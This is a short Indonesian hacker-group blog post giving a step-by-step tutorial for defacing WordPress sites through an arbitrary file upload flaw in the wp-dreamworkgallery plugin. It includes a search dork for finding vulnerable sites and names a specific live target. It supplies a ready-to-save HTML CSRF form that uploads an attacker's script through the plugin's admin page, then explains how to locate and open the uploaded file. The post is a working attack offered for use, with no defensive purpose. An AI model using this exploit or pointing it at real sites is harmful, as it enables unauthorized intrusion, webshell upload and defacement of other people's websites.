Deface POC Arbitrary + Live Terget



Hello My Friends balik lagi Ama si Adm00N JCS/Jason Cyber Squad Kali Ini gua bakal ngasih tutor Deface POC Arbitrary

Pertama tama
Ini Dork Nya yaa pak inurl:/wp-content/plugins/wp-dreamworkgallery

Ini live Target Nya H3h3
http://salonbluehair.com

Ini Csrf nya ya pak

<form action="http:/target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

Save pake Extensi Html yaakk

Teros DORKing dlo kalo vuln kek gini nih gambar nya kalo vuln tampilan nya kek gini nihh
Teros langsung Gasak Yaak
Lu upload script lu di Csrf itu
Teros bagaimana cara akses nyaa 
Lu salin kode yang gua garis bawahin
Lu salin kode nya sampe nama sc lu 
Done
Thanks To ADM00N JASON CYBER SQUAD
SarkEvih_ID
Z3X_ID
2M4

Komentar

Postingan Populer